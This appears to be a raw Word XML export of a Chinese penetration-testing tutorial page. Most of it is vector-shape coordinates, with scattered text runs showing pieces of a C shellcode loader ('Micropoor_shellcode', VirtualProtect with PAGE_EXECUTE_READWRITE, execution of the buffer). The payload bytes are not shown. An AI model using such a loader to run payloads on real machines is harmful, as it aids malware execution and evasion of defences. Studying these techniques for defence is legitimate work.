5048,11130,5046,11130,5045,11130,5043,11130,5041,11130,5039,11130,5037,11130,5035,11130,5034,11130,5032,11130,5030,11130,5027,11130,5025,11130,5023,11130,5021,11130,5019,11130,5016,11130,5014,11130,5012,11130,5009,11130,5007,11130,5004,11130,5002,11130,4999,11130,4996,11130,4994,11130,4991,11130,4988,11130,4985,11130,4982,11130,4980,11130,4977,11130,4977,11130,4977,11130,4977,11130,4977,11130,4977,11130,4977,11130,4977,11130,4977,11130,4977,11130,4977,11129,4977,11129,4977,11129,4977,11129,4977,11129,4977,11129,4977,11129,4977,11129,4977,11129,4977,11129,4977,11129,4977,11128,4977,11128,4977,11128,4977,11128,4977,11128,4977,11127,4977,11127,4977,11127,4977,11126,4977,11126,4977,11126,4977,11125,4977,11125,4977,11124,4977,11124,4977,11123,4977,11123,4977,11122,4977,11121,4977,11121,4977,11120,4977,11119,4977,11118,4977,11118,4977,11117,4977,11116,4977,11115,4977,11114,4977,11113,4977,11112,4977,11111,4977,11110,4977,11108,4977,11107,4977,11106,4977,11104,4977,11103,4977,11102,4977,11100,4977,11099,4977,11097,4977,11095,4977,11094,4977,11092,4977,11090,4977,11088,4977,11086,4977,11084,4977,11082,4977,11080,4977,11078,4977,11075,4977,11073,4977,11071,4977,11068,4977,11066,4977,11063,4977,11060,4977,11058,4977,11055,4977,11052,4977,11049,4977,11046,4977,11043,4977,11040,4977,11037,4977,11033,4977,11030,4977,11026,4977,11023,4977,11019,4977,11016,4977,11012,4977,11008,4977,11004,4977,11000,4977,10996,4977,10991,4977,10987,4977,10983,4977,10978,4977,10974,4977,10969,4977,10964,4977,10959,4977,10954,4977,10949,4977,10944,4977,10939,4977,10934,4977,10928,4977,10923,4977,10917,4977,10911,4977,10905,4977,10899,4977,10893,4977,10887,4977,10881,4977,10874e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:127.500pt;margin-top:560.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2550,11210" coordsize="130,270">
        <v:shape style="position:absolute;left:2550;top:11210;width:130;height:270" coordorigin="2550,11210" coordsize="130,270" path="m2575,11235l2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2575,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2576,11235,2577,11235,2577,11235,2577,11235,2577,11235,2577,11235,2577,11235,2578,11235,2578,11235,2578,11235,2578,11235,2579,11235,2579,11235,2579,11235,2580,11235,2580,11235,2580,11235,2581,11235,2581,11235,2581,11235,2582,11235,2582,11235,2583,11235,2583,11235,2584,11235,2584,11235,2585,11235,2585,11235,2586,11235,2587,11235,2587,11235,2588,11235,2588,11235,2589,11235,2590,11235,2591,11235,2591,11235,2592,11235,2593,11235,2594,11235,2595,11235,2596,11235,2597,11235,2598,11235,2599,11235,2600,11235,2601,11235,2602,11235,2603,11235,2604,11235,2605,11235,2607,11235,2608,11235,2609,11235,2610,11235,2612,11235,2613,11235,2615,11235,2616,11235,2618,11235,2619,11235,2621,11235,2622,11235,2624,11235,2626,11235,2627,11235,2629,11235,2631,11235,2633,11235,2634,11235,2636,11235,2638,11235,2640,11235,2642,11235,2644,11235,2647,11235,2649,11235,2651,11235,2653,11235,2655,11235,2658,11235,2660,11235,2663,11235,2665,11235,2668,11235,2670,11235,2673,11235,2675,11235,2678,11235,2681,11235,2684,11235,2687,11235,2689,11235,2692,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11235,2695,11236,2695,11236,2695,11236,2695,11236,2695,11236,2695,11237,2695,11237,2695,11237,2695,11237,2695,11238,2695,11238,2695,11238,2695,11239,2695,11239,2695,11240,2695,11240,2695,11241,2695,11241,2695,11242,2695,11242,2695,11243,2695,11244,2695,11244,2695,11245,2695,11246,2695,11247,2695,11248,2695,11248,2695,11249,2695,11250,2695,11251,2695,11252,2695,11254,2695,11255,2695,11256,2695,11257,2695,11258,2695,11260,2695,11261,2695,11263,2695,11264,2695,11266,2695,11267,2695,11269,2695,11271,2695,11273,2695,11274,2695,11276,2695,11278,2695,11280,2695,11282,2695,11284,2695,11287,2695,11289,2695,11291,2695,11294,2695,11296,2695,11299,2695,11301,2695,11304,2695,11307,2695,11309,2695,11312,2695,11315,2695,11318,2695,11321,2695,11324,2695,11328,2695,11331,2695,11334,2695,11338,2695,11341,2695,11345,2695,11349,2695,11353,2695,11356,2695,11360,2695,11364,2695,11369,2695,11373,2695,11377,2695,11382,2695,11386,2695,11391,2695,11395,2695,11400,2695,11405,2695,11410,2695,11415,2695,11420,2695,11425,2695,11431,2695,11436,2695,11442,2695,11447,2695,11453,2695,11459,2695,11465,2695,11471,2695,11477,2695,11483,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2695,11490,2694,11490,2694,11490,2694,11490,2694,11490,2694,11490,2694,11490,2694,11490,2693,11490,2693,11490,2693,11490,2693,11490,2693,11490,2692,11490,2692,11490,2692,11490,2691,11490,2691,11490,2691,11490,2690,11490,2690,11490,2690,11490,2689,11490,2689,11490,2688,11490,2688,11490,2687,11490,2687,11490,2686,11490,2686,11490,2685,11490,2685,11490,2684,11490,2684,11490,2683,11490,2682,11490,2681,11490,2681,11490,2680,11490,2679,11490,2678,11490,2678,11490,2677,11490,2676,11490,2675,11490,2674,11490,2673,11490,2672,11490,2671,11490,2670,11490,2669,11490,2668,11490,2666,11490,2665,11490,2664,11490,2663,11490,2662,11490,2660,11490,2659,11490,2657,11490,2656,11490,2655,11490,2653,11490,2652,11490,2650,11490,2648,11490,2647,11490,2645,11490,2643,11490,2642,11490,2640,11490,2638,11490,2636,11490,2634,11490,2632,11490,2630,11490,2628,11490,2626,11490,2624,11490,2622,11490,2620,11490,2618,11490,2615,11490,2613,11490,2611,11490,2608,11490,2606,11490,2603,11490,2601,11490,2598,11490,2595,11490,2593,11490,2590,11490,2587,11490,2584,11490,2581,11490,2578,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11490,2575,11489,2575,11489,2575,11489,2575,11489,2575,11489,2575,11489,2575,11489,2575,11489,2575,11488,2575,11488,2575,11488,2575,11488,2575,11487,2575,11487,2575,11487,2575,11486,2575,11486,2575,11486,2575,11485,2575,11485,2575,11484,2575,11484,2575,11483,2575,11483,2575,11482,2575,11481,2575,11481,2575,11480,2575,11479,2575,11479,2575,11478,2575,11477,2575,11476,2575,11475,2575,11474,2575,11473,2575,11472,2575,11471,2575,11470,2575,11469,2575,11467,2575,11466,2575,11465,2575,11463,2575,11462,2575,11460,2575,11459,2575,11457,2575,11455,2575,11454,2575,11452,2575,11450,2575,11448,2575,11446,2575,11444,2575,11442,2575,11440,2575,11438,2575,11436,2575,11433,2575,11431,2575,11428,2575,11426,2575,11423,2575,11421,2575,11418,2575,11415,2575,11412,2575,11409,2575,11406,2575,11403,2575,11400,2575,11397,2575,11393,2575,11390,2575,11387,2575,11383,2575,11379,2575,11376,2575,11372,2575,11368,2575,11364,2575,11360,2575,11356,2575,11352,2575,11347,2575,11343,2575,11338,2575,11334,2575,11329,2575,11324,2575,11319,2575,11315,2575,11309,2575,11304,2575,11299,2575,11294,2575,11288,2575,11283,2575,11277,2575,11271,2575,11265,2575,11260,2575,11253,2575,11247,2575,11241,2575,11235e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:616.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,12330" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:12330;width:130;height:270" coordorigin="3010,12330" coordsize="130,270" path="m3026,12345l3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3026,12345,3027,12345,3027,12345,3027,12345,3027,12345,3027,12345,3027,12345,3027,12345,3028,12345,3028,12345,3028,12345,3028,12345,3029,12345,3029,12345,3029,12345,3029,12345,3030,12345,3030,12345,3030,12345,3031,12345,3031,12345,3032,12345,3032,12345,3032,12345,3033,12345,3033,12345,3034,12345,3034,12345,3035,12345,3036,12345,3036,12345,3037,12345,3037,12345,3038,12345,3039,12345,3039,12345,3040,12345,3041,12345,3042,12345,3043,12345,3043,12345,3044,12345,3045,12345,3046,12345,3047,12345,3048,12345,3049,12345,3050,12345,3051,12345,3052,12345,3053,12345,3054,12345,3056,12345,3057,12345,3058,12345,3059,12345,3061,12345,3062,12345,3063,12345,3065,12345,3066,12345,3068,12345,3069,12345,3071,12345,3072,12345,3074,12345,3076,12345,3077,12345,3079,12345,3081,12345,3083,12345,3085,12345,3087,12345,3089,12345,3091,12345,3093,12345,3095,12345,3097,12345,3099,12345,3101,12345,3103,12345,3106,12345,3108,12345,3110,12345,3113,12345,3115,12345,3118,12345,3120,12345,3123,12345,3126,12345,3128,12345,3131,12345,3134,12345,3137,12345,3140,12345,3143,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12345,3146,12346,3146,12346,3146,12346,3146,12346,3146,12346,3146,12346,3146,12346,3146,12346,3146,12347,3146,12347,3146,12347,3146,12347,3146,12348,3146,12348,3146,12348,3146,12349,3146,12349,3146,12349,3146,12350,3146,12350,3146,12351,3146,12351,3146,12352,3146,12352,3146,12353,3146,12354,3146,12354,3146,12355,3146,12356,3146,12356,3146,12357,3146,12358,3146,12359,3146,12360,3146,12361,3146,12362,3146,12363,3146,12364,3146,12365,3146,12367,3146,12368,3146,12369,3146,12370,3146,12372,3146,12373,3146,12375,3146,12376,3146,12378,3146,12380,3146,12381,3146,12383,3146,12385,3146,12387,3146,12389,3146,12391,3146,12393,3146,12395,3146,12397,3146,12399,3146,12402,3146,12404,3146,12407,3146,12409,3146,12412,3146,12414,3146,12417,3146,12420,3146,12423,3146,12426,3146,12429,3146,12432,3146,12435,3146,12438,3146,12442,3146,12445,3146,12448,3146,12452,3146,12456,3146,12459,3146,12463,3146,12467,3146,12471,3146,12475,3146,12479,3146,12483,3146,12488,3146,12492,3146,12497,3146,12501,3146,12506,3146,12511,3146,12516,3146,12520,3146,12526,3146,12531,3146,12536,3146,12541,3146,12547,3146,12552,3146,12558,3146,12564,3146,12570,3146,12575,3146,12582,3146,12588,3146,12594,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3146,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3145,12600,3144,12600,3144,12600,3144,12600,3144,12600,3144,12600,3144,12600,3143,12600,3143,12600,3143,12600,3143,12600,3143,12600,3142,12600,3142,12600,3142,12600,3141,12600,3141,12600,3141,12600,3140,12600,3140,12600,3140,12600,3139,12600,3139,12600,3138,12600,3138,12600,3137,12600,3137,12600,3136,12600,3136,12600,3135,12600,3134,12600,3134,12600,3133,12600,3132,12600,3132,12600,3131,12600,3130,12600,3129,12600,3129,12600,3128,12600,3127,12600,3126,12600,3125,12600,3124,12600,3123,12600,3122,12600,3121,12600,3120,12600,3119,12600,3118,12600,3117,12600,3116,12600,3114,12600,3113,12600,3112,12600,3110,12600,3109,12600,3108,12600,3106,12600,3105,12600,3103,12600,3102,12600,3100,12600,3099,12600,3097,12600,3095,12600,3094,12600,3092,12600,3090,12600,3088,12600,3086,12600,3084,12600,3083,12600,3081,12600,3079,12600,3076,12600,3074,12600,3072,12600,3070,12600,3068,12600,3065,12600,3063,12600,3061,12600,3058,12600,3056,12600,3053,12600,3051,12600,3048,12600,3045,12600,3043,12600,3040,12600,3037,12600,3034,12600,3031,12600,3029,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12600,3026,12599,3026,12599,3026,12599,3026,12599,3026,12599,3026,12599,3026,12598,3026,12598,3026,12598,3026,12597,3026,12597,3026,12597,3026,12596,3026,12596,3026,12595,3026,12595,3026,12594,3026,12594,3026,12593,3026,12593,3026,12592,3026,12591,3026,12591,3026,12590,3026,12589,3026,12588,3026,12587,3026,12587,3026,12586,3026,12585,3026,12584,3026,12583,3026,12581,3026,12580,3026,12579,3026,12578,3026,12577,3026,12575,3026,12574,3026,12572,3026,12571,3026,12569,3026,12568,3026,12566,3026,12564,3026,12562,3026,12561,3026,12559,3026,12557,3026,12555,3026,12553,3026,12551,3026,12548,3026,12546,3026,12544,3026,12541,3026,12539,3026,12536,3026,12534,3026,12531,3026,12529,3026,12526,3026,12523,3026,12520,3026,12517,3026,12514,3026,12511,3026,12507,3026,12504,3026,12501,3026,12497,3026,12494,3026,12490,3026,12486,3026,12482,3026,12479,3026,12475,3026,12471,3026,12466,3026,12462,3026,12458,3026,12453,3026,12449,3026,12444,3026,12440,3026,12435,3026,12430,3026,12425,3026,12420,3026,12415,3026,12410,3026,12404,3026,12399,3026,12393,3026,12388,3026,12382,3026,12376,3026,12370,3026,12364,3026,12358,3026,12352,3026,12345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源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>码如下：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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>include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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;windows.h&gt;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int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main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void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-2"/>
        </w:rPr>
        <w:t>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407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char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char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"Micropoor_shellcode"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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5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DWORD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Micropoor_shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22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ret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VirtualProtect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strlen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PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22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&amp;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Micropoor_shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="20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13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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="18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96c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ret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1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return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EXIT_FAILURE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void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void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return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EXIT_SUCCESS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-2"/>
        </w:rPr>
        <w:t>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200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="31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原始shellc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ode_payload大小如下：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757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76字节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265.800pt;height:144.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:262.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,5250" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:5250;width:110;height:110" coordorigin="1790,5250" coordsize="110,110" path="m1900,5322l1900,5322,1900,5322,1900,5323,1900,5324,1900,5325,1900,5325,1900,5326,1900,5327,1900,5328,1900,5328,1900,5329,1900,5330,1899,5330,1899,5331,1899,5332,1899,5332,1899,5333,1899,5334,1899,5334,1899,5335,1899,5336,1899,5336,1898,5337,1898,5337,1898,5338,1898,5339,1898,5339,1898,5340,1897,5340,1897,5341,1897,5342,1897,5342,1897,5343,1896,5343,1896,5344,1896,5344,1896,5345,1896,5345,1895,5346,1895,5346,1895,5347,1895,5347,1894,5348,1894,5348,1894,5349,1894,5349,1893,5350,1893,5350,1893,5351,1892,5351,1892,5352,1892,5352,1891,5352,1891,5353,1891,5353,1890,5354,1890,5354,1890,5354,1889,5355,1889,5355,1889,5356,1888,5356,1888,5356,1887,5357,1887,5357,1887,5357,1886,5358,1886,5358,1885,5358,1885,5359,1884,5359,1884,5359,1883,5360,1883,5360,1883,5360,1882,5361,1882,5361,1881,5361,1881,5361,1880,5362,1880,5362,1879,5362,1879,5362,1878,5363,1878,5363,1877,5363,1876,5363,1876,5363,1875,5364,1875,5364,1874,5364,1874,5364,1873,5364,1872,5365,1872,5365,1871,5365,1871,5365,1870,5365,1869,5365,1869,5365,1868,5366,1868,5366,1867,5366,1866,5366,1866,5366,1865,5366,1864,5366,1864,5366,1863,5366,1862,5366,1861,5366,1861,5366,1860,5367,1859,5367,1859,5367,1858,5367,1857,5367,1856,5367,1856,5367,1855,5367,1855,5367,1854,5367,1853,5367,1853,5367,1852,5367,1851,5367,1851,5367,1850,5367,1849,5366,1848,5366,1848,5366,1847,5366,1846,5366,1846,5366,1845,5366,1844,5366,1844,5366,1843,5366,1842,5366,1842,5366,1841,5365,1840,5365,1840,5365,1839,5365,1839,5365,1838,5365,1837,5365,1837,5364,1836,5364,1836,5364,1835,5364,1835,5364,1834,5363,1833,5363,1833,5363,1832,5363,1832,5363,1831,5362,1831,5362,1830,5362,1830,5362,1829,5361,1829,5361,1828,5361,1828,5361,1827,5360,1827,5360,1826,5360,1826,5359,1825,5359,1825,5359,1825,5358,1824,5358,1824,5358,1823,5357,1823,5357,1823,5357,1822,5356,1822,5356,1821,5356,1821,5355,1821,5355,1820,5354,1820,5354,1820,5354,1819,5353,1819,5353,1819,5352,1818,5352,1818,5352,1818,5351,1817,5351,1817,5350,1817,5350,1816,5349,1816,5349,1816,5348,1816,5348,1815,5347,1815,5347,1815,5346,1815,5346,1814,5345,1814,5345,1814,5344,1814,5344,1813,5343,1813,5343,1813,5342,1813,5342,1813,5341,1812,5340,1812,5340,1812,5339,1812,5339,1812,5338,1812,5337,1811,5337,1811,5336,1811,5336,1811,5335,1811,5334,1811,5334,1811,5333,1811,5332,1811,5332,1810,5331,1810,5330,1810,5330,1810,5329,1810,5328,1810,5328,1810,5327,1810,5326,1810,5325,1810,5325,1810,5324,1810,5323,1810,5322,1810,5322,1810,5322,1810,5321,1810,5320,1810,5319,1810,5319,1810,5318,1810,5317,1810,5317,1810,5316,1810,5315,1810,5314,1810,5314,1810,5313,1810,5312,1811,5312,1811,5311,1811,5310,1811,5310,1811,5309,1811,5308,1811,5308,1811,5307,1811,5307,1812,5306,1812,5305,1812,5305,1812,5304,1812,5304,1812,5303,1813,5302,1813,5302,1813,5301,1813,5301,1813,5300,1814,5300,1814,5299,1814,5299,1814,5298,1815,5298,1815,5297,1815,5296,1815,5296,1816,5296,1816,5295,1816,5295,1816,5294,1817,5294,1817,5293,1817,5293,1818,5292,1818,5292,1818,5291,1819,5291,1819,5291,1819,5290,1820,5290,1820,5289,1820,5289,1821,5288,1821,5288,1821,5288,1822,5287,1822,5287,1823,5287,1823,5286,1823,5286,1824,5286,1824,5285,1825,5285,1825,5285,1825,5284,1826,5284,1826,5284,1827,5283,1827,5283,1828,5283,1828,5283,1829,5282,1829,5282,1830,5282,1830,5281,1831,5281,1831,5281,1832,5281,1832,5281,1833,5280,1833,5280,1834,5280,1835,5280,1835,5280,1836,5279,1836,5279,1837,5279,1837,5279,1838,5279,1839,5278,1839,5278,1840,5278,1840,5278,1841,5278,1842,5278,1842,5278,1843,5278,1844,5277,1844,5277,1845,5277,1846,5277,1846,5277,1847,5277,1848,5277,1848,5277,1849,5277,1850,5277,1851,5277,1851,5277,1852,5277,1853,5277,1853,5277,1854,5277,1855,5277,1855,5277,1856,5277,1856,5277,1857,5277,1858,5277,1859,5277,1859,5277,1860,5277,1861,5277,1861,5277,1862,5277,1863,5277,1864,5277,1864,5277,1865,5277,1866,5277,1866,5277,1867,5278,1868,5278,1868,5278,1869,5278,1869,5278,1870,5278,1871,5278,1871,5278,1872,5279,1872,5279,1873,5279,1874,5279,1874,5279,1875,5280,1875,5280,1876,5280,1876,5280,1877,5280,1878,5281,1878,5281,1879,5281,1879,5281,1880,5281,1880,5282,1881,5282,1881,5282,1882,5283,1882,5283,1883,5283,1883,5283,1883,5284,1884,5284,1884,5284,1885,5285,1885,5285,1886,5285,1886,5286,1887,5286,1887,5286,1887,5287,1888,5287,1888,5287,1889,5288,1889,5288,1889,5288,1890,5289,1890,5289,1890,5290,1891,5290,1891,5291,1891,5291,1892,5291,1892,5292,1892,5292,1893,5293,1893,5293,1893,5294,1894,5294,1894,5295,1894,5295,1894,5296,1895,5296,1895,5296,1895,5297,1895,5298,1896,5298,1896,5299,1896,5299,1896,5300,1896,5300,1897,5301,1897,5301,1897,5302,1897,5302,1897,5303,1898,5304,1898,5304,1898,5305,1898,5305,1898,5306,1898,5307,1899,5307,1899,5308,1899,5308,1899,5309,1899,5310,1899,5310,1899,5311,1899,5312,1899,5312,1899,5313,1900,5314,1900,5314,1900,5315,1900,5316,1900,5317,1900,5317,1900,5318,1900,5319,1900,5319,1900,5320,1900,5321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,1900,5322e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:283.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,5670" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:5670;width:110;height:110" coordorigin="1790,5670" coordsize="110,110" path="m1900,5742l1900,5742,1900,5743,1900,5743,1900,5744,1900,5745,1900,5746,1900,5746,1900,5747,1900,5748,1900,5748,1900,5749,1900,5750,1899,5751,1899,5751,1899,5752,1899,5753,1899,5753,1899,5754,1899,5754,1899,5755,1899,5756,1899,5756,1898,5757,1898,5758,1898,5758,1898,5759,1898,5759,1898,5760,1897,5761,1897,5761,1897,5762,1897,5762,1897,5763,1896,5763,1896,5764,1896,5764,1896,5765,1896,5766,1895,5766,1895,5767,1895,5767,1895,5768,1894,5768,1894,5769,1894,5769,1894,5770,1893,5770,1893,5770,1893,5771,1892,5771,1892,5772,1892,5772,1891,5773,1891,5773,1891,5773,1890,5774,1890,5774,1890,5775,1889,5775,1889,5775,1889,5776,1888,5776,1888,5777,1887,5777,1887,5777,1887,5778,1886,5778,1886,5778,1885,5779,1885,5779,1884,5779,1884,5780,1883,5780,1883,5780,1883,5780,1882,5781,1882,5781,1881,5781,1881,5782,1880,5782,1880,5782,1879,5782,1879,5783,1878,5783,1878,5783,1877,5783,1876,5783,1876,5784,1875,5784,1875,5784,1874,5784,1874,5784,1873,5785,1872,5785,1872,5785,1871,5785,1871,5785,1870,5785,1869,5786,1869,5786,1868,5786,1868,5786,1867,5786,1866,5786,1866,5786,1865,5786,1864,5786,1864,5786,1863,5787,1862,5787,1861,5787,1861,5787,1860,5787,1859,5787,1859,5787,1858,5787,1857,5787,1856,5787,1856,5787,1855,5787,1855,5787,1854,5787,1853,5787,1853,5787,1852,5787,1851,5787,1851,5787,1850,5787,1849,5787,1848,5787,1848,5787,1847,5787,1846,5786,1846,5786,1845,5786,1844,5786,1844,5786,1843,5786,1842,5786,1842,5786,1841,5786,1840,5786,1840,5785,1839,5785,1839,5785,1838,5785,1837,5785,1837,5785,1836,5784,1836,5784,1835,5784,1835,5784,1834,5784,1833,5783,1833,5783,1832,5783,1832,5783,1831,5783,1831,5782,1830,5782,1830,5782,1829,5782,1829,5781,1828,5781,1828,5781,1827,5780,1827,5780,1826,5780,1826,5780,1825,5779,1825,5779,1825,5779,1824,5778,1824,5778,1823,5778,1823,5777,1823,5777,1822,5777,1822,5776,1821,5776,1821,5775,1821,5775,1820,5775,1820,5774,1820,5774,1819,5773,1819,5773,1819,5773,1818,5772,1818,5772,1818,5771,1817,5771,1817,5770,1817,5770,1816,5770,1816,5769,1816,5769,1816,5768,1815,5768,1815,5767,1815,5767,1815,5766,1814,5766,1814,5765,1814,5764,1814,5764,1813,5763,1813,5763,1813,5762,1813,5762,1813,5761,1812,5761,1812,5760,1812,5759,1812,5759,1812,5758,1812,5758,1811,5757,1811,5756,1811,5756,1811,5755,1811,5754,1811,5754,1811,5753,1811,5753,1811,5752,1810,5751,1810,5751,1810,5750,1810,5749,1810,5748,1810,5748,1810,5747,1810,5746,1810,5746,1810,5745,1810,5744,1810,5743,1810,5743,1810,5742,1810,5742,1810,5741,1810,5740,1810,5740,1810,5739,1810,5738,1810,5737,1810,5737,1810,5736,1810,5735,1810,5735,1810,5734,1810,5733,1810,5733,1811,5732,1811,5731,1811,5731,1811,5730,1811,5729,1811,5729,1811,5728,1811,5727,1811,5727,1812,5726,1812,5726,1812,5725,1812,5724,1812,5724,1812,5723,1813,5723,1813,5722,1813,5721,1813,5721,1813,5720,1814,5720,1814,5719,1814,5719,1814,5718,1815,5718,1815,5717,1815,5717,1815,5716,1816,5716,1816,5715,1816,5715,1816,5714,1817,5714,1817,5713,1817,5713,1818,5712,1818,5712,1818,5712,1819,5711,1819,5711,1819,5710,1820,5710,1820,5709,1820,5709,1821,5709,1821,5708,1821,5708,1822,5708,1822,5707,1823,5707,1823,5706,1823,5706,1824,5706,1824,5705,1825,5705,1825,5705,1825,5705,1826,5704,1826,5704,1827,5704,1827,5703,1828,5703,1828,5703,1829,5702,1829,5702,1830,5702,1830,5702,1831,5701,1831,5701,1832,5701,1832,5701,1833,5701,1833,5700,1834,5700,1835,5700,1835,5700,1836,5700,1836,5699,1837,5699,1837,5699,1838,5699,1839,5699,1839,5699,1840,5698,1840,5698,1841,5698,1842,5698,1842,5698,1843,5698,1844,5698,1844,5698,1845,5697,1846,5697,1846,5697,1847,5697,1848,5697,1848,5697,1849,5697,1850,5697,1851,5697,1851,5697,1852,5697,1853,5697,1853,5697,1854,5697,1855,5697,1855,5697,1856,5697,1856,5697,1857,5697,1858,5697,1859,5697,1859,5697,1860,5697,1861,5697,1861,5697,1862,5697,1863,5697,1864,5697,1864,5697,1865,5697,1866,5698,1866,5698,1867,5698,1868,5698,1868,5698,1869,5698,1869,5698,1870,5698,1871,5699,1871,5699,1872,5699,1872,5699,1873,5699,1874,5699,1874,5700,1875,5700,1875,5700,1876,5700,1876,5700,1877,5701,1878,5701,1878,5701,1879,5701,1879,5701,1880,5702,1880,5702,1881,5702,1881,5702,1882,5703,1882,5703,1883,5703,1883,5704,1883,5704,1884,5704,1884,5705,1885,5705,1885,5705,1886,5705,1886,5706,1887,5706,1887,5706,1887,5707,1888,5707,1888,5708,1889,5708,1889,5708,1889,5709,1890,5709,1890,5709,1890,5710,1891,5710,1891,5711,1891,5711,1892,5712,1892,5712,1892,5712,1893,5713,1893,5713,1893,5714,1894,5714,1894,5715,1894,5715,1894,5716,1895,5716,1895,5717,1895,5717,1895,5718,1896,5718,1896,5719,1896,5719,1896,5720,1896,5720,1897,5721,1897,5721,1897,5722,1897,5723,1897,5723,1898,5724,1898,5724,1898,5725,1898,5726,1898,5726,1898,5727,1899,5727,1899,5728,1899,5729,1899,5729,1899,5730,1899,5731,1899,5731,1899,5732,1899,5733,1899,5733,1900,5734,1900,5735,1900,5735,1900,5736,1900,5737,1900,5737,1900,5738,1900,5739,1900,5740,1900,5740,1900,5741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,1900,5742e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
